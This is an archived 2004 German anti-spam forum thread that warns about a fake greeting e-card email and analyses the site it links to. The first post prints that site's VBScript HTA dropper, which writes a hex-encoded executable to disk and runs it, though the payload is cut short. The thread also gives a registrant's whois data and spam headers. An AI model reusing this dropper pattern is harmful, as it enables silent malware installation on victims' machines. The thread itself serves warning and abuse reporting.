PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [UBE/Dialer/Hacking] You have received Greeting E-Card!



Eniac
28.09.2004, 09:22
VORSICHT: Der unten beschriebene Link versucht mittels des Windows-Scripting-Host vermutlich etwas Böses zu installieren!
Betreten der Website auf eigene Gefahr!
Dazu wird in index3.html die php-Datei index3.php in ein Objekt eingebunden; dieses erzeugt dann eine HTA (HTML-Application) mit folgendem Inhalt:

<SCRIPT language=vbs>
self.MoveTo 6000,6000
set a=CreateObject("Scripting.FileSystemObject")
set b=a.CreateTextFile("C:kernel32.exe",1)
b.Write(H("4D5A90
....viele viele weitere Zeichen......
02A"))
b.Write(H(""))
b.Close
Set shell = CreateObject("WScript.Shell")
shell.run("C:kernel32.exe")
Function H(H1)
Dim H2
Dim H3:H2=""
For H3=1 To Len(H1) Step 2
H2=H2&Chr("&h"&Mid(H1,H3,2))
Next
H=H2
End Function
</SCRIPT>
Das sieht nicht gut aus; was es genau ist vermag ich nicht zu sagen, ich tippe mal auf Dialer.

whois neofazis.biz:

Domain Name: NEOFAZIS.BIZ
Domain ID: [ID filtered]
Sponsoring Registrar: ENOM, INC.
Domain Status: ok
Registrant ID: [ID filtered]
Registrant Name: Alex Sidorovsky
Registrant Organization: PEKOS
Registrant Address1: Komunisticheskaya 18-167
Registrant City: Moscow
Registrant State/Province: RU
Registrant Postal Code: 839235
Registrant Country: Russian Federation
Registrant Country Code: RU
Registrant Phone Number: +7.9202537888
Registrant Email: MAMBA [at] ESECONSULT.NET

--------------------------------------------------

Re: 69.70.101.189 (Ursprungsquelle der Spammail)
To: abuse#videotron.ca
Re: neofazis.biz [69.46.10.93] (beworbene Seite)
To: abuse#hivelocity.net

===8<==============Original message text===============
Received: from modemcable189.101-70-69.mc.videotron.ca (modemcable189.101-70-69.mc.videotron.ca [69.70.101.189])
by mailgate2.xxxyyyzzz.de (MOS 3.4.6-GR)
with SMTP ID: [ID filtered]
Wed, 29 Sep 2004 xx:xx:xx +0200 (CEST)
From: "grusskarten [at] e-card.net" <grusskarten [at] e-card.net>
To: "someone.else" <poor [at] spamvictim.tld>
Subject: You have received Greeting E-Card!
Date: Wen, 29 Aug 2004 xx:xx:xx +0000
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
Message-ID: [ID filtered]
X-Mailer: Microsoft Outlook Express 5.50.4922.1500
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4922.1500
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Junkmail: UCE(198)
X-Junkmail-Status: score=198/50, host=mailgate2.xxxyyyzzz.de
A `Send a Greeting` card has been sent to you!

To retrieve this card, please go to this URL:
h t t p : / / neofazis . biz/index3.html

(note: your card will be kept on-line for 2 weeks.)

===8<===========End of original message text===========

Eniac

Spamgegner
02.10.2004, 12:42
Ich hasse solche Spammer, die ihren Mist als E-Card tarnen...
Die bringen irgendwann noch die ganzen seriösen E-Card Anbieter in Verruf...


-------------------------------------------------
Newsletter gehackt?
- In einem Atomkraftwerk kann man auch nicht sagen, man habe keine rote Warnlampe leuchten sehen und keine Alarm-Sirenen gehört...

RA Meier-Bading
02.10.2004, 23:49
Wenn man IE als UserAgent einstellt, landet man inzwischen bei h t t p:// www. neofazis.biz/index2.htm, vonwoaus eine böseböse Exedatei runtergeladen wird:
h t t p:// www. neofazis.biz/cht.exe
ich kann sie hier grad leider nicht testen ....